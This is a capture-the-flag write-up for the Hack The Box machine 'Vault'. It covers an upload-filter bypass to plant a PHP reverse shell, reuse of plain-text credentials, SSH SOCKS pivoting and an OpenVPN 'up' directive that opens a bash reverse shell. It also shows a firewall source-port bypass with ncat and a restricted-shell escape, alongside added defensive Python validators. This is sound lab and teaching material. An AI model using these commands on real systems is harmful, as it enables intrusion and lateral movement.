Vault

06/04/2019

I found Vault a pretty tough box for its medium ranking: getting an initial shell is easy (it only requires some web fuzzing), but then you need to make several lateral movements through different machines in the right order to reach the flags, and getting root requires a basic knowledge of PGP.

User Privilege Escalation

User

First we run nmap and see that only ports 22 and 80 are open.

root@kali:~/htb/vault# nmap -sC -sV 10.10.10.109
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-07 14:55 UTC
Nmap scan report for 10.10.10.109
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)
|   256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)
|_  256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.96 seconds

On the main page of the Apache server we have the following text.

Since the page mentions a client called Sparklays, we look for web content under the /sparklays directory with wfuzz and find the following pages.

root@kali:~/htb/vault# wfuzz -w /usr/share/wordlists/dirb/common.txt -z list,-.php-.html --hc 404,403 http://10.10.10.109/sparklays/FUZZFUZ2Z

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.1 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.109/sparklays/FUZZFUZ2Z
Total requests: 13842

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000857:  C=200     13 L	      38 W	    615 Ch	  "admin - .php"
000868:  C=200     13 L	      38 W	    615 Ch	  "admin.php - "
003694:  C=301      9 L	      28 W	    323 Ch	  "design - "
007040:  C=200      3 L	       2 W	     16 Ch	  "login - .php"

In /sparklays/admin.php we have an admin login panel, but after trying some default credentials and getting nothing, I left it behind.

In the other site, /sparklays/login.php, we have a simple message.

We look for more web content on /sparklays/design directory.

root@kali:~/htb/vault# wfuzz -w /usr/share/wordlists/dirb/common.txt -z list,-.php-.html --hc 404,403 http://10.10.10.109/sparklays/design/FUZZFUZ2Z

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.1 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.109/sparklays/design/FUZZFUZ2Z
Total requests: 13842

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

003696:  C=200      3 L	       8 W	     72 Ch	  "design - .html"
012646:  C=301      9 L	      28 W	    331 Ch	  "uploads - "

In /sparklays/design/design.html we have a page with just a link.

If we click on it we get redirected to a form where we can upload files. The /sparklays/design/uploads directory (also in the wfuzz output) is likely where those uploaded files are stored.

We're going to upload a PHP reverse shell there to gain access to the machine. If we try to upload a .php file we get "sorry that file type is not allowed", but changing the file extension to .php5 is enough to get the file uploaded correctly.

Accessing http://10.10.10.109/sparklays/design/uploads/php-reverse-shell.php5 executes our code, and if we are listening on the specified port we get a shell as www-data.

root@kali:~/htb/vault# nc -nlvp 6969
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::6969
Ncat: Listening on 0.0.0.0:6969
Ncat: Connection from 10.10.10.109.
Ncat: Connection from 10.10.10.109:49780.
Linux ubuntu 4.13.0-45-generic #50~16.04.1-Ubuntu SMP Wed May 30 11:18:27 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 07:43:29 up  3:10,  3 users,  load average: 0.09, 0.04, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
dave     pts/11   10.10.14.80      06:36   22.00s  0.12s  0.05s python3 -c import pty;pty.spawn("/bin/bash")
dave     pts/16   127.0.0.1        06:42   60.00s  0.08s  0.08s -bash
dave     pts/18   10.10.13.91      07:40    9.00s  0.20s  0.20s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 
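The upload check above only rejected the literal .php extension, so .php5 slipped through. As an added example (not the box's upload handler), here is a denylist check of that shape beside an allowlist check that also refuses double extensions and path characters; the filenames and policies are constructed for illustration.

```python
import os
import re
import secrets

# Weak policy: only the extensions we thought of are blocked.
DENIED_EXTENSIONS = {".php"}
# Hardened policy: only explicitly expected extensions are accepted.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}
# Base name must not carry dots, slashes or other separators, so a name like
# "shell.php.png" cannot rely on the web server handling a second extension.
SAFE_BASENAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def denylist_allows(filename: str) -> bool:
    """The weak check: reject only extensions on the denylist.
    Returns True for 'php-reverse-shell.php5', which is exactly the bypass."""
    _, ext = os.path.splitext(filename)
    return ext.lower() not in DENIED_EXTENSIONS


def allowlist_allows(filename: str) -> bool:
    """The hardened check: one extension from the allowlist and a plain base name."""
    base, ext = os.path.splitext(filename)
    if ext.lower() not in ALLOWED_EXTENSIONS:
        return False
    return SAFE_BASENAME.fullmatch(base) is not None


def stored_name(filename: str) -> str:
    """Server-chosen storage name: random base plus the validated extension,
    so the client never controls the name written under the web root."""
    if not allowlist_allows(filename):
        raise ValueError("file type is not allowed")
    _, ext = os.path.splitext(filename)
    return secrets.token_hex(8) + ext.lower()


if __name__ == "__main__":
    for name in ("php-reverse-shell.php5", "shell.php", "shell.php.png", "logo.png"):
        print(f"{name:26} denylist={denylist_allows(name)!s:5} allowlist={allowlist_allows(name)}")
```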

Doing some simple enumeration we find the following readable files on Dave's desktop.

$ ls -la /home/dave/Desktop
total 20
drwxr-xr-x  2 dave dave 4096 Sep  3 06:51 .
drwxr-xr-x 18 dave dave 4096 Sep  3 08:34 ..
-rw-rw-r--  1 alex alex   74 Jul 17  2018 Servers
-rw-rw-r--  1 alex alex   14 Jul 17  2018 key
-rw-rw-r--  1 alex alex   20 Jul 17  2018 ssh

We have some interesting information here: Servers contains some network information, key what seems to be a password, and ssh probably the SSH credentials.

$ cat Servers
DNS + Configurator - 192.168.122.4
Firewall - 192.168.122.5
The Vault - x
$ cat key
itscominghome
$ cat ssh
dave
Dav3therav3123

We can use those ssh credentials to get a more stable shell as dave.

root@kali:~/htb/vault# ssh dave@10.10.10.109
dave@10.10.10.109's password: Dav3therav3123
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

222 packages can be updated.
47 updates are security updates.

Last login: Thu Feb  7 07:47:56 2019 from 10.10.16.35
dave@ubuntu:~$ 

Now we can read the admin panel and login page code to confirm those were just rabbit holes.

dave@ubuntu:/var/www/html/sparklays$ cat login.php 
access denied


dave@ubuntu:/var/www/html/sparklays$ cat admin.php 
<div class="container">
<form action ="admin.php" method="GET">
        <h2 class="form-signin-heading">Please Login</h2>
        <div class="input-group">
	  <span class="input-group-addon" id="basic-addon1">username</span>
	  <input type="text" name="username" class="form-control" placeholder="username" required>
	</div>
        <label for="inputPassword" class="sr-only">Password</label>
        <input type="password" name="password" id="inputPassword" class="form-control" placeholder="Password" required>
        <button class="btn btn-lg btn-primary btn-block" type="submit">Login</button>

      </form>
<?php
$username =$_GET["username"];
$domain = $_SERVER["SERVER_NAME"];
$requri = $_SERVER['REQUEST_URI'];
if (($domain == "localhost") )  { 
   Header( "Welcome Dave" ); 
   header("location: sparklays-local-admin-interface-0001.php
  "); 
}

else if (($username == "dave")) {
  setcookie(sparklaysdatastorage.htb-unbreakable-cookie);

}

?>

As we saw in the Servers file, there are more machines on this network (192.168.122.4 [DNS + Configurator], 192.168.122.5 [Firewall] and x [Vault]). Since there don't seem to be any flags on this host, let's use nc to see what services they're running so we can pivot.

dave@ubuntu:/var/www/html/sparklays$ nc -zv 192.168.122.5 1-65535 2>&1 | grep succeeded
dave@ubuntu:/var/www/html/sparklays$ nc -zv 192.168.122.4 1-65535 2>&1 | grep succeeded
Connection to 192.168.122.4 22 port [tcp/ssh] succeeded!
Connection to 192.168.122.4 80 port [tcp/http] succeeded!

We can see we have ssh and a web service available on 192.168.122.4 (the DNS + Configurator machine according to the Servers file).

Since this machine doesn't have curl and it's always easier to work from a web browser, we're going to set up port forwarding to make 192.168.122.4 reachable from our local machine.

I'm using dynamic port forwarding, which lets us make any TCP connection through the ubuntu host when we use proxychains, so we will be able to reach the 192.168.122.x network.

man ssh:
-f Request ssh to go to the background.
-N Do not execute a remote command.
-D Dynamic port forwarding.

root@kali:~/htb/vault# ssh -fND 1337 dave@10.10.10.109
dave@10.10.10.109's password: Dav3therav3123
root@kali:~/htb/vault# 

Next, modify the proxychains configuration (/etc/proxychains.conf) on our local machine and add the following line so it uses the specified port over SOCKS5.

socks5 	127.0.0.1 1337

We can confirm everything works as expected by making a curl request through proxychains.

root@kali:~/htb/vault# curl 192.168.122.4

root@kali:~/htb/vault# proxychains curl 192.168.122.4
ProxyChains-3.1 (http://proxychains.sf.net)
<h1> Welcome to the Sparklays DNS Server </h1>
<p>
<a href="dns-config.php">Click here to modify your DNS Settings</a><br>
<a href="vpnconfig.php">Click here to test your VPN Configuration</a>

You can use this configuration in FoxyProxy or in the web browser's proxy settings to use SOCKS5 there as well.

Now we're able to connect to 192.168.122.4 web page through the web browser.

The first option redirects us to /dns-config.php but we get a 404 error, so nothing to see here.

The "test your VPN Configuration" link redirects us to /vpnconfig.php where we seem to have a textarea we can use to modify a .ovpn file and a link to test it.

Meanwhile we had wfuzz running through proxychains to look for more web content, and it found a /notes file.

root@kali:~/htb/vault# proxychains wfuzz -w /usr/share/wordlists/dirb/common.txt --hc 404,403 http://192.168.122.4/FUZZ
ProxyChains-3.1 (http://proxychains.sf.net)

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.1 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.122.4/FUZZ
Total requests: 4614

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000001:  C=200      6 L	      25 W	    195 Ch	  ""
002021:  C=200      6 L	      25 W	    195 Ch	  "index.php"
002695:  C=200      1 L	       6 W	     36 Ch	  "notes"

Accessing /notes we find a note containing two filenames: 123.ovpn and script.sh.

They are accessible through the web server, so let's download them to see what's inside.

root@kali:~/htb/vault# proxychains wget 192.168.122.4/123.ovpn
root@kali:~/htb/vault# proxychains wget 192.168.122.4/script.sh
...
root@kali:~/htb/vault# cat 123.ovpn 
remote 192.168.122.1
dev tun
nobind
script-security 2
up "/bin/bash -c 'bash -i >& /dev/tcp/192.168.122.1/2323 0>&1'"
root@kali:~/htb/vault# cat script.sh 
#!/bin/bash
sudo openvpn 123.ovpn

The .ovpn file is the one we can edit and run from /vpnconfig.php.

We could modify the ovpn configuration, but since the default one already gives us a shell on 192.168.122.1 (the ubuntu host), let's use it as is.

Click on Test VPN or access http://192.168.122.4/vpnconfig.php?function=testvpn to run the ovpn; if we were listening on the specified port on the ubuntu machine, we get a shell on DNS as root.

dave@ubuntu:/tmp$ nc -nlvp 2323
Listening on [0.0.0.0] (family 0, port 2323)
Connection from [192.168.122.4] port 2323 [tcp/*] accepted (family 2, sport 48334)
bash: cannot set terminal process group (1089): Inappropriate ioctl for device
bash: no job control in this shell
root@DNS:/var/www/html# 
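The root cause here is that /vpnconfig.php hands a user-editable config to sudo openvpn, and OpenVPN will run whatever the up directive names once script-security is 2 or higher. As an added example (not code from the box), the validator below is what such a front end should run before executing a config: it rejects every directive that makes OpenVPN execute commands or load code, using the 123.ovpn from this page as the constructed bad input.

```python
import shlex

# OpenVPN directives whose argument is a command, script, library or plugin.
# Any of them in a user-supplied config means arbitrary execution as the
# user running openvpn (root, via the sudo in script.sh).
SCRIPT_DIRECTIVES = {
    "up", "down", "route-up", "route-pre-down", "ipchange", "tls-verify",
    "auth-user-pass-verify", "client-connect", "client-disconnect",
    "learn-address", "plugin",
}

# The 123.ovpn found on the DNS host, used here as sample input.
PAGE_CONFIG = """remote 192.168.122.1
dev tun
nobind
script-security 2
up "/bin/bash -c 'bash -i >& /dev/tcp/192.168.122.1/2323 0>&1'"
"""


def ovpn_problems(text: str) -> list:
    """Return a list of human-readable findings; empty means no script hooks."""
    problems = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        # OpenVPN treats lines beginning with '#' or ';' as comments.
        if not line or line[0] in "#;":
            continue
        try:
            parts = shlex.split(line)
        except ValueError:
            problems.append(f"line {n}: unbalanced quoting")
            continue
        key = parts[0].lower()
        if key in SCRIPT_DIRECTIVES:
            problems.append(f"line {n}: script directive '{key}'")
        elif key == "script-security" and len(parts) > 1 \
                and parts[1].isdigit() and int(parts[1]) >= 2:
            problems.append(f"line {n}: script-security {parts[1]} permits command execution")
    return problems


def is_safe_ovpn(text: str) -> bool:
    """True only when the config carries no command, script or plugin hooks."""
    return not ovpn_problems(text)


if __name__ == "__main__":
    for p in ovpn_problems(PAGE_CONFIG):
        print(p)
```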

Here we can find the user flag in dave's home folder.

root@DNS:/home/dave# cat user.txt
cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Privilege Escalation

First of all, we can also find an ssh file with some credentials.

root@DNS:/home/dave# cat ssh
cat ssh
dave
dav3gerous567

We can get a more stable shell using those credentials instead of the ovpn.

dave@ubuntu:~$ ssh dave@192.168.122.4
dave@192.168.122.4's password: dav3gerous567
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

98 packages can be updated.
50 updates are security updates.


Last login: Fri Feb  8 07:53:00 2019 from 192.168.122.1
dave@DNS:~$ 

In the sudo configuration we can see dave can execute anything as root.

dave@DNS:~$ sudo -l
Matching Defaults entries for dave on DNS:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dave may run the following commands on DNS:
    (ALL : ALL) ALL

If we check /etc/hosts we can also see the IP of our target machine (Vault): 192.168.5.2.

dave@DNS:~$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	DNS
192.168.5.2	Vault
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

After some enumeration we find interesting information about the vault host in /var/log/auth.log, which records all authentication-related events.

dave@DNS:/home$ sudo less /var/log/auth.log
...
Sep  2 15:07:51 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
...
Sep  2 15:10:20 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 1234 --sh-exec ncat 192.168.5.2 987 -p 53
...
Sep  2 15:10:34 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 3333 --sh-exec ncat 192.168.5.2 987 -p 53
...
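Those sudo entries are the kind of evidence a defender wants surfaced automatically. As an added example (not part of the original writeup), here is a parser for sudo lines in auth.log that extracts the user, TTY, working directory, target user and command, and flags commands that run network tools under sudo; the sample log lines are constructed to match the three entries shown above.

```python
import os
import re

# Shape of a sudo entry in /var/log/auth.log on Ubuntu 16.04.
SUDO_LINE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) sudo:\s+"
    r"(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# Tools whose use under sudo by an interactive user is worth a closer look.
NETWORK_TOOLS = {"nmap", "ncat", "nc", "netcat", "socat", "ssh", "openvpn"}

# Constructed sample, modelled on the entries found on the DNS host.
SAMPLE_LOG = """\
Sep  2 15:07:40 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/bin/ls /root
Sep  2 15:07:51 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
Sep  2 15:08:02 DNS sshd[1201]: Accepted password for dave from 192.168.122.1 port 47692 ssh2
Sep  2 15:10:20 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 1234 --sh-exec ncat 192.168.5.2 987 -p 53
"""


def parse_sudo_line(line: str):
    """Return the fields of a sudo entry as a dict, or None for other lines."""
    m = SUDO_LINE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def flag_network_sudo(log_text: str) -> list:
    """Return (user, tool, full command) for sudo entries that run network tools
    or chain a second command via --sh-exec / --exec."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_sudo_line(line)
        if entry is None:
            continue
        argv = entry["cmd"].split()
        tool = os.path.basename(argv[0]) if argv else ""
        chained = any(a in ("--sh-exec", "--exec", "-e") for a in argv)
        if tool in NETWORK_TOOLS or chained:
            hits.append((entry["user"], tool, entry["cmd"]))
    return hits


if __name__ == "__main__":
    for user, tool, cmd in flag_network_sudo(SAMPLE_LOG):
        print(f"{user} ran {tool} as root: {cmd}")
```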

If we replicate the nmap command we can see port 987 is open on 192.168.5.2.

dave@DNS:/home$ sudo /usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f

Starting Nmap 7.01 ( https://nmap.org ) at 2019-02-08 10:33 GMT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for Vault (192.168.5.2)
Host is up (0.0042s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE
987/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 43.47 seconds

Looking at netstat we can see connections from ports 53 and 4444 of the DNS host to port 987 of the vault host.

dave@DNS:~$ netstat -atun
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        1      0 192.168.122.4:55434     192.168.122.1:4411      CLOSE_WAIT 
tcp        0      0 192.168.122.4:4444      192.168.5.2:987         TIME_WAIT  
tcp        0      0 192.168.122.4:53        192.168.5.2:987         TIME_WAIT  
tcp        6      0 192.168.122.4:55432     192.168.122.1:4411      CLOSE_WAIT 
tcp        0      0 192.168.122.4:55436     192.168.122.1:4411      ESTABLISHED
tcp        0      0 192.168.122.4:22        192.168.122.1:47692     ESTABLISHED
tcp6       0      0 :::80                   :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       0      0 192.168.122.4:80        192.168.122.1:50616     ESTABLISHED
tcp6       1      0 192.168.122.4:80        192.168.122.1:50556     CLOSE_WAIT 
tcp6       1      0 192.168.122.4:80        192.168.122.1:50586     CLOSE_WAIT 

auth.log also had an ncat command; let's try it to see what we get.

dave@DNS:~$ sudo ncat 192.168.5.2 987 -p 53
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4

So it seems that only if we use port 53 or 4444 as the source port can we connect to an SSH service on vault.

To make the ssh client use a specific source port we can use the full command we got in auth.log, which sets up a port forward on the same host.

dave@DNS:~$ sudo /usr/bin/ncat -l 1234 --sh-exec "ncat 192.168.5.2 987 -p 53"

Since the above command blocks, we can use & to run it in the background or open another console on the machine.

Now if we connect to the port specified in the port forward on localhost we get the SSH banner from 192.168.5.2.

dave@DNS:~$ nc localhost 1234
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4

If we run ssh with the same credentials we used on the DNS machine we get access to vault.

dave@DNS:~$ ssh dave@localhost -p 1234
dave@localhost's password: dav3gerous567
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

96 packages can be updated.
49 updates are security updates.


Last login: Mon Sep  3 16:48:00 2018
dave@vault:~$ 

Unfortunately it's a restricted shell and we can barely execute anything.

dave@vault:~$ cd ..
-rbash: cd: restricted

We can easily escape that restricted shell by using the following ssh command instead.

dave@DNS:~$ ssh dave@localhost -p 1234 -t "bash --noprofile"
dave@localhost's password: 
dave@vault:~$ cd ..
dave@vault:/home$ 

In dave's home folder we have an interesting file root.txt.gpg.

dave@vault:~$ ls -la
total 40
drwxr-xr-x 5 dave dave 4096 Sep  3 16:47 .
drwxr-xr-x 4 root root 4096 Jul 17  2018 ..
-rw------- 1 dave dave   11 Sep  3 16:47 .bash_history
-rw-r--r-- 1 dave dave  220 Jul 17  2018 .bash_logout
-rw-r--r-- 1 dave dave 3771 Jul 17  2018 .bashrc
drwx------ 2 dave dave 4096 Jul 17  2018 .cache
drwxrwxr-x 2 dave dave 4096 Sep  2 15:11 .nano
-rw-r--r-- 1 dave dave  655 Jul 17  2018 .profile
-rw-rw-r-- 1 dave dave  629 Sep  3 14:57 root.txt.gpg
drwx------ 2 dave dave 4096 Jul 17  2018 .ssh

This is a PGP-encrypted message and we need a specific private key to decrypt it.

dave@vault:~$ file root.txt.gpg
root.txt.gpg: PGP RSA encrypted session key - keyid: 10C678C7 31FEBD1 RSA (Encrypt or Sign) 4096b .

Unfortunately we don't seem to have it on this host.

dave@vault:~$ gpg -d root.txt.gpg 
gpg: directory `/home/dave/.gnupg' created
gpg: new configuration file `/home/dave/.gnupg/gpg.conf' created
gpg: WARNING: options in `/home/dave/.gnupg/gpg.conf' are not yet active during this run
gpg: keyring `/home/dave/.gnupg/secring.gpg' created
gpg: keyring `/home/dave/.gnupg/pubring.gpg' created
gpg: encrypted with RSA key, ID D1EB1F03
gpg: decryption failed: secret key not available

But we do have the private key with ID D1EB1F03 on the ubuntu host we first visited.

dave@ubuntu:~$ gpg --list-secret-keys
/home/dave/.gnupg/secring.gpg
-----------------------------
sec   4096R/0FDFBFE4 2018-07-24
uid                  david <dave@david.com>
ssb   4096R/D1EB1F03 2018-07-24

Now we have to move that encrypted message to the ubuntu machine, and since it contains non-ASCII characters we can't simply copy and paste it. We could move it from machine to machine with scp, but I found it easier to convert it to base64 and copy-paste it.

Since we don't have the base64 command I used python (python3m, because we don't have the default python executable either).

dave@vault:~$ python3m
Python 3.5.2 (default, Nov 23 2017, 16:37:01) 
[GCC 5.4.0 20160609] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import base64
>>> with open("root.txt.gpg", "rb") as f:
...     print(base64.b64encode(f.read()))
... 

Copy and paste it to the ubuntu machine and base64-decode it back.

dave@ubuntu:/tmp$ echo -n hQIMA8d4xh...Yij98= | base64 -d > caca

Now we can decrypt it using the password we found at the beginning in the key file (itscominghome) and get the root flag.

dave@ubuntu:/tmp$ gpg -d caca

You need a passphrase to unlock the secret key for
user: "david <dave@david.com>"
4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4)

gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24
      "david <dave@david.com>"
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX